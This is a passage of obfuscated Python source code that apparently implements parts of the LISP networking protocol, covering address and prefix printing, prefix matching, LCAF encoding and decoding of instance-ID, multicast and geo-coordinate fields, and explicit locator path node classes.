Iii1iI1IIi = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , Iii1iI1IIi ) )
if 39 - 39: iII111i / I11i
IiiIIi1 = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
if 67 - 67: i1IIi
ooo = IiiIIi1 . find ( "no-address" )
if ( ooo == - 1 ) :
IiiIIi1 = "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) )
else :
IiiIIi1 = IiiIIi1 [ 0 : ooo ]
if 1 - 1: OoOoOO00 * O0 + i11iIiiIii . ooOoO0o / OoO0O00
return ( IiiIIi1 )
if 48 - 48: o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
def print_prefix_no_iid ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
return ( "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) ) )
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
IiiIIi1 = self . print_address ( )
ooo = IiiIIi1 . find ( "]" )
if ( ooo != - 1 ) : IiiIIi1 = IiiIIi1 [ ooo + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = IiiIIi1 . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , IiiIIi1 ) )
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
return ( "{}-{}-{}" . format ( self . instance_id , IiiIIi1 , self . mask_len ) )
if 14 - 14: OOooOOo * IiII
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
def print_sg ( self , g ) :
IiII1iiI = self . print_prefix ( )
i1I111 = IiII1iiI . find ( "]" ) + 1
g = g . print_prefix ( )
O0o0 = g . find ( "]" ) + 1
II11I = "[{}]({}, {})" . format ( self . instance_id , IiII1iiI [ i1I111 : : ] , g [ O0o0 : : ] )
return ( II11I )
if 35 - 35: I1IiiI * OoO0O00 - iII111i . Ii1I + ooOoO0o
if 81 - 81: OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % I1Ii111 / ooOoO0o
def hash_address ( self , addr ) :
Ii1iiI1i1 = self . address
iIi = addr . address
if 53 - 53: O0 / I1ii11iIi11i . OoooooooOO
if ( self . is_geo_prefix ( ) ) : Ii1iiI1i1 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : iIi = addr . address . print_geo ( )
if 35 - 35: OoOoOO00 - OOooOOo + OoOoOO00 % OoooooooOO . oO0o
if ( type ( Ii1iiI1i1 ) == str ) :
Ii1iiI1i1 = int ( binascii . hexlify ( Ii1iiI1i1 [ 0 : 1 ] ) )
if 61 - 61: I11i / o0oOOo0O0Ooo / OoO0O00
if ( type ( iIi ) == str ) :
iIi = int ( binascii . hexlify ( iIi [ 0 : 1 ] ) )
if 17 - 17: o0oOOo0O0Ooo * OoO0O00 + I11i + oO0o % OoOoOO00 - Oo0Ooo
return ( Ii1iiI1i1 ^ iIi )
if 63 - 63: i11iIiiIii % I11i
if 64 - 64: oO0o + I11i / i1IIi * OoO0O00
if 19 - 19: O0 . O0
if 13 - 13: i11iIiiIii - i11iIiiIii . iIii1I11I1II1 - O0 . I11i / i11iIiiIii
if 59 - 59: ooOoO0o + I1ii11iIi11i . OoO0O00 . O0
if 45 - 45: O0 . o0oOOo0O0Ooo + OoOoOO00 / I1ii11iIi11i + Ii1I % I1Ii111
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 20 - 20: Oo0Ooo
iIi1iii1 = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
IIIIIiI1 = 2 ** ( 32 - iIi1iii1 )
iIii1i11iI1 = prefix . instance_id
Iii1iI1IIi = iIii1i11iI1 + IIIIIiI1
return ( self . instance_id in range ( iIii1i11iI1 , Iii1iI1IIi ) )
if 7 - 7: OoooooooOO % I1Ii111 * I1Ii111 - II111iiii - Ii1I
if 75 - 75: o0oOOo0O0Ooo / Oo0Ooo + oO0o
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 67 - 67: IiII + OoooooooOO . i11iIiiIii - I1Ii111 . i11iIiiIii
if 70 - 70: OoO0O00 * OoooooooOO
if 52 - 52: Ii1I . iII111i / OoooooooOO
if 19 - 19: OOooOOo % o0oOOo0O0Ooo
if 23 - 23: I1Ii111 % iIii1I11I1II1 - ooOoO0o
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
IiiIIi1 = self . address
oOiII1i1 = prefix . address
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = self . address . print_geo ( )
oOiII1i1 = prefix . address . print_geo ( )
if 6 - 6: Oo0Ooo
if ( len ( IiiIIi1 ) < len ( oOiII1i1 ) ) : return ( False )
return ( IiiIIi1 . find ( oOiII1i1 ) == 0 )
if 9 - 9: Oo0Ooo - II111iiii - i1IIi - ooOoO0o / o0oOOo0O0Ooo * I1ii11iIi11i
if 29 - 29: ooOoO0o
if 65 - 65: i1IIi * ooOoO0o * I1IiiI
if 36 - 36: o0oOOo0O0Ooo - Ii1I + O0 + OOooOOo
if 11 - 11: I11i / OoooooooOO . I11i . II111iiii / oO0o - i11iIiiIii
if ( self . mask_len < iIi1iii1 ) : return ( False )
if 67 - 67: o0oOOo0O0Ooo . I1Ii111 % iIii1I11I1II1 / I1Ii111
IIiIiII = ( prefix . addr_length ( ) * 8 ) - iIi1iii1
oOoo00oOoO0o = ( 2 ** iIi1iii1 - 1 ) << IIiIiII
return ( ( self . address & oOoo00oOoO0o ) == prefix . address )
if 18 - 18: I11i * ooOoO0o
if 46 - 46: IiII
def mask_address ( self , mask_len ) :
IIiIiII = ( self . addr_length ( ) * 8 ) - mask_len
oOoo00oOoO0o = ( 2 ** mask_len - 1 ) << IIiIiII
self . address &= oOoo00oOoO0o
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
O00OooO0o = self . print_prefix ( )
oo00oO000oOo = prefix . print_prefix ( ) if prefix else ""
return ( O00OooO0o == oo00oO000oOo )
if 57 - 57: I1IiiI - ooOoO0o
if 70 - 70: I1ii11iIi11i * ooOoO0o
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
IIIIIi = lisp_myrlocs [ 0 ]
if ( IIIIIi == None ) : return ( False )
IIIIIi = IIIIIi . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == IIIIIi )
if 40 - 40: I1IiiI / I1ii11iIi11i / Oo0Ooo
if ( self . is_ipv6 ( ) ) :
IIIIIi = lisp_myrlocs [ 1 ]
if ( IIIIIi == None ) : return ( False )
IIIIIi = IIIIIi . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == IIIIIi )
if 28 - 28: OoO0O00 / I1ii11iIi11i % OOooOOo % I1IiiI + Ii1I
return ( False )
if 6 - 6: o0oOOo0O0Ooo % OOooOOo
if 71 - 71: oO0o + II111iiii * O0 / i11iIiiIii * o0oOOo0O0Ooo
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 85 - 85: o0oOOo0O0Ooo - I1Ii111
self . instance_id = iid
self . mask_len = mask_len
if 90 - 90: OoO0O00 * I1Ii111 * iII111i * Ii1I + OoOoOO00 / iII111i
if 63 - 63: o0oOOo0O0Ooo * I1Ii111
def lcaf_length ( self , lcaf_type ) :
iiiIIiiIi = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : iiiIIiiIi += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : iiiIIiiIi += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : iiiIIiiIi += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : iiiIIiiIi = iiiIIiiIi * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : iiiIIiiIi += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : iiiIIiiIi += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : iiiIIiiIi += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : iiiIIiiIi += 4
return ( iiiIIiiIi )
if 9 - 9: ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if 10 - 10: OOooOOo * OoooooooOO
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
if 62 - 62: I11i
if 58 - 58: I11i . OoOoOO00 + iII111i . iII111i
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
if 66 - 66: iII111i + i1IIi
if 24 - 24: O0 / OoooooooOO - OoOoOO00
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
def lcaf_encode_iid ( self ) :
O000oo0O0OO0 = LISP_LCAF_INSTANCE_ID_TYPE
O0III1Iiii1i11 = socket . htons ( self . lcaf_length ( O000oo0O0OO0 ) )
o0OoO0000o = self . instance_id
O000oOOoOOO = self . afi
o00O0Oo = 0
if ( O000oOOoOOO < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
O000oOOoOOO = LISP_AFI_LCAF
o00O0Oo = 0
else :
O000oOOoOOO = 0
o00O0Oo = self . mask_len
if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
if 53 - 53: i11iIiiIii % I1ii11iIi11i
oO0OoOo0oo = struct . pack ( "BBBBH" , 0 , 0 , O000oo0O0OO0 , o00O0Oo , O0III1Iiii1i11 )
oO0OoOo0oo += struct . pack ( "IH" , socket . htonl ( o0OoO0000o ) , socket . htons ( O000oOOoOOO ) )
if ( O000oOOoOOO == 0 ) : return ( oO0OoOo0oo )
if 63 - 63: IiII + oO0o + II111iiii * I11i
if ( self . afi == LISP_AFI_GEO_COORD ) :
oO0OoOo0oo = oO0OoOo0oo [ 0 : - 2 ]
oO0OoOo0oo += self . address . encode_geo ( )
return ( oO0OoOo0oo )
if 49 - 49: OoO0O00
if 78 - 78: I1IiiI - I1ii11iIi11i
oO0OoOo0oo += self . pack_address ( )
return ( oO0OoOo0oo )
if 24 - 24: Ii1I + I11i
if 5 - 5: I1Ii111 . Ii1I - ooOoO0o % OoooooooOO
def lcaf_decode_iid ( self , packet ) :
O00oO00oOO00O = "BBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 2 - 2: OOooOOo . IiII . iII111i / Oo0Ooo
O0o000 , o00oo0 , O000oo0O0OO0 , o0Ooo , iiiIIiiIi = struct . unpack ( O00oO00oOO00O ,
packet [ : ooOoooOoo0oO ] )
packet = packet [ ooOoooOoo0oO : : ]
if 34 - 34: OoooooooOO % OoOoOO00 * o0oOOo0O0Ooo . oO0o
if ( O000oo0O0OO0 != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 94 - 94: O0 . I1ii11iIi11i . i11iIiiIii - I1Ii111 . IiII + oO0o
O00oO00oOO00O = "IH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 48 - 48: OoOoOO00 * I11i
o0OoO0000o , O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
packet = packet [ ooOoooOoo0oO : : ]
if 92 - 92: I1IiiI * I1IiiI
iiiIIiiIi = socket . ntohs ( iiiIIiiIi )
self . instance_id = socket . ntohl ( o0OoO0000o )
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
self . afi = O000oOOoOOO
if ( o0Ooo != 0 and O000oOOoOOO == 0 ) : self . mask_len = o0Ooo
if ( O000oOOoOOO == 0 ) :
self . afi = LISP_AFI_IID_RANGE if o0Ooo else LISP_AFI_ULTIMATE_ROOT
if 9 - 9: IiII * I1IiiI * OoO0O00 - I1IiiI * I1IiiI - OoO0O00
if 20 - 20: i1IIi + I1IiiI + i11iIiiIii + II111iiii + i1IIi
if 18 - 18: i11iIiiIii * O0 * Oo0Ooo + iII111i + OOooOOo
if 62 - 62: OOooOOo - oO0o + i1IIi % Ii1I . I1Ii111 . II111iiii
if 94 - 94: OOooOOo - I1IiiI
if ( O000oOOoOOO == 0 ) : return ( packet )
if 35 - 35: i11iIiiIii
if 27 - 27: O0 % i11iIiiIii - I1Ii111 * oO0o - I11i / Oo0Ooo
if 78 - 78: O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if 14 - 14: I11i + ooOoO0o . oO0o * I11i
if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
O00oO00oOO00O = "BBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if ( O000oo0O0OO0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 36 - 36: IiII % I11i
iiii1 = socket . ntohs ( iiii1 )
packet = packet [ ooOoooOoo0oO : : ]
if ( iiii1 > len ( packet ) ) : return ( None )
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
iiIi1ii1IiI = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = iiIi1ii1IiI
packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if 82 - 82: OoooooooOO
O0III1Iiii1i11 = self . addr_length ( )
if ( len ( packet ) < O0III1Iiii1i11 ) : return ( None )
if 14 - 14: OoO0O00 / oO0o - OOooOOo
packet = self . unpack_address ( packet )
return ( packet )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
if 92 - 92: I11i + OoO0O00 . OoooooooOO
if 3 - 3: OoO0O00 % iIii1I11I1II1
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
if 18 - 18: i11iIiiIii
if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
def lcaf_encode_sg ( self , group ) :
O000oo0O0OO0 = LISP_LCAF_MCAST_INFO_TYPE
o0OoO0000o = socket . htonl ( self . instance_id )
O0III1Iiii1i11 = socket . htons ( self . lcaf_length ( O000oo0O0OO0 ) )
oO0OoOo0oo = struct . pack ( "BBBBHIHBB" , 0 , 0 , O000oo0O0OO0 , 0 , O0III1Iiii1i11 , o0OoO0000o ,
0 , self . mask_len , group . mask_len )
if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
oO0OoOo0oo += struct . pack ( "H" , socket . htons ( self . afi ) )
oO0OoOo0oo += self . pack_address ( )
oO0OoOo0oo += struct . pack ( "H" , socket . htons ( group . afi ) )
oO0OoOo0oo += group . pack_address ( )
return ( oO0OoOo0oo )
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
def lcaf_decode_sg ( self , packet ) :
O00oO00oOO00O = "BBBBHIHBB"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if 53 - 53: OOooOOo % ooOoO0o
O0o000 , o00oo0 , O000oo0O0OO0 , O0Ooo000OO00 , iiiIIiiIi , o0OoO0000o , OOOoo0Oo , O000O00oOO , o0o0oOo00Oo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 94 - 94: ooOoO0o / Ii1I
packet = packet [ ooOoooOoo0oO : : ]
if 9 - 9: I1Ii111 * oO0o
if ( O000oo0O0OO0 != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 44 - 44: ooOoO0o * oO0o
self . instance_id = socket . ntohl ( o0OoO0000o )
iiiIIiiIi = socket . ntohs ( iiiIIiiIi ) - 8
if 67 - 67: iIii1I11I1II1 . iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if 70 - 70: I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
if 12 - 12: Oo0Ooo + I1IiiI
if 12 - 12: OoOoOO00 / II111iiii
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if ( iiiIIiiIi < ooOoooOoo0oO ) : return ( [ None , None ] )
if 28 - 28: I1IiiI
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
iiiIIiiIi -= ooOoooOoo0oO
self . afi = socket . ntohs ( O000oOOoOOO )
self . mask_len = O000O00oOO
O0III1Iiii1i11 = self . addr_length ( )
if ( iiiIIiiIi < O0III1Iiii1i11 ) : return ( [ None , None ] )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 46 - 46: II111iiii
iiiIIiiIi -= O0III1Iiii1i11
if 24 - 24: i11iIiiIii * i1IIi - I11i + o0oOOo0O0Ooo
if 60 - 60: ooOoO0o
if 62 - 62: i11iIiiIii
if 88 - 88: i11iIiiIii
if 59 - 59: oO0o - OoooooooOO % ooOoO0o
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if ( iiiIIiiIi < ooOoooOoo0oO ) : return ( [ None , None ] )
if 90 - 90: OoOoOO00
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
iiiIIiiIi -= ooOoooOoo0oO
O0o00oOOOO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
O0o00oOOOO00 . afi = socket . ntohs ( O000oOOoOOO )
O0o00oOOOO00 . mask_len = o0o0oOo00Oo
O0o00oOOOO00 . instance_id = self . instance_id
O0III1Iiii1i11 = self . addr_length ( )
if ( iiiIIiiIi < O0III1Iiii1i11 ) : return ( [ None , None ] )
if 96 - 96: II111iiii % Ii1I
packet = O0o00oOOOO00 . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 84 - 84: I1IiiI . I1IiiI
return ( [ packet , O0o00oOOOO00 ] )
if 82 - 82: OoO0O00 - iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
if 45 - 45: iII111i . oO0o * iII111i
def lcaf_decode_eid ( self , packet ) :
O00oO00oOO00O = "BBB"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( [ None , None ] )
if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
if 97 - 97: o0oOOo0O0Ooo + Ii1I
if 77 - 77: I11i - oO0o . Ii1I
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
O0Ooo000OO00 , ooOOooooo0Oo , O000oo0O0OO0 = struct . unpack ( O00oO00oOO00O ,
packet [ : ooOoooOoo0oO ] )
if 74 - 74: ooOoO0o
if ( O000oo0O0OO0 == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( O000oo0O0OO0 == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , O0o00oOOOO00 = self . lcaf_decode_sg ( packet )
return ( [ packet , O0o00oOOOO00 ] )
elif ( O000oo0O0OO0 == LISP_LCAF_GEO_COORD_TYPE ) :
O00oO00oOO00O = "BBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 18 - 18: iIii1I11I1II1 - I11i - oO0o
i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
if ( O000oo0O0OO0 != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
iiii1 = socket . ntohs ( iiii1 )
packet = packet [ ooOoooOoo0oO : : ]
if ( iiii1 > len ( packet ) ) : return ( None )
if 98 - 98: O0 - I1Ii111 - i11iIiiIii
iiIi1ii1IiI = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = iiIi1ii1IiI
packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
self . mask_len = self . host_mask_len ( )
if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
return ( [ packet , None ] )
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
if 80 - 80: OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
class lisp_elp_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 1 - 1: OoO0O00 - I1IiiI * o0oOOo0O0Ooo
if 84 - 84: OoO0O00 % OoooooooOO
def copy_elp_node ( self ) :
Ooo0o0OoOO = lisp_elp_node ( )
Ooo0o0OoOO . copy_address ( self . address )
Ooo0o0OoOO . probe = self . probe
Ooo0o0OoOO . strict = self . strict
Ooo0o0OoOO . eid = self . eid
Ooo0o0OoOO . we_are_last = self . we_are_last
return ( Ooo0o0OoOO )
if 66 - 66: OoOoOO00 . iII111i
if 1 - 1: iII111i * i1IIi . iIii1I11I1II1 % O0 - OoooooooOO
if 87 - 87: iII111i . Oo0Ooo * i11iIiiIii % o0oOOo0O0Ooo + Ii1I
class lisp_elp ( ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
def copy_elp ( self ) :
Ii1111i = lisp_elp ( self . elp_name )
Ii1111i . use_elp_node = self . use_elp_node
Ii1111i . we_are_last = self . we_are_last
for Ooo0o0OoOO in self . elp_nodes :
Ii1111i . elp_nodes . append ( Ooo0o0OoOO . copy_elp_node ( ) )
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
return ( Ii1111i )
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
def print_elp ( self , want_marker ) :
OoOo0Oo0 = ""
for Ooo0o0OoOO in self . elp_nodes :
Oo0000 = ""
if ( want_marker ) :
if ( Ooo0o0OoOO == self . use_elp_node ) :
Oo0000 = "*"
elif ( Ooo0o0OoOO . we_are_last ) :
Oo0000 = "x"
if 76 - 76: iIii1I11I1II1
if 55 - 55: II111iiii % O0 * O0 - II111iiii * I1IiiI % Oo0Ooo
OoOo0Oo0 += "{}{}({}{}{}), " . format ( Oo0000 ,
Ooo0o0OoOO . address . print_address_no_iid ( ) ,
"r" if Ooo0o0OoOO . eid else "R" , "P" if Ooo0o0OoOO . probe else "p" ,
"S" if Ooo0o0OoOO . strict else "s" )
if 48 - 48: I1ii11iIi11i + OoooooooOO % i1IIi
return ( OoOo0Oo0 [ 0 : - 2 ] if OoOo0Oo0 != "" else "" )
if 46 - 46: OoOoOO00
if 75 - 75: I1IiiI
def select_elp_node ( self ) :
Ii1II111i1 , iii1i , OoO0o0OOOO = lisp_myrlocs
ooo = None
if 100 - 100: OOooOOo * OoooooooOO
for Ooo0o0OoOO in self . elp_nodes :
if ( Ii1II111i1 and Ooo0o0OoOO . address . is_exact_match ( Ii1II111i1 ) ) :
ooo = self . elp_nodes . index ( Ooo0o0OoOO )
break
if 80 - 80: O0 + oO0o - OoooooooOO - O0 . ooOoO0o . OoooooooOO
if ( iii1i and Ooo0o0OoOO . address . is_exact_match ( iii1i ) ) :
ooo = self . elp_nodes . index ( Ooo0o0OoOO )
break
if 76 - 76: Ii1I
if 62 - 62: O0 / OoO0O00 % i11iIiiIii / OOooOOo * iIii1I11I1II1
if 78 - 78: OOooOOo % O0 * O0
if 62 - 62: ooOoO0o
if 77 - 77: I1IiiI . i11iIiiIii - I1ii11iIi11i
if 83 - 83: OoO0O00 - i11iIiiIii + I1ii11iIi11i - OOooOOo / OoOoOO00 / I11i
if 53 - 53: I11i * I1IiiI . I1IiiI / o0oOOo0O0Ooo - I1Ii111
if ( ooo == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
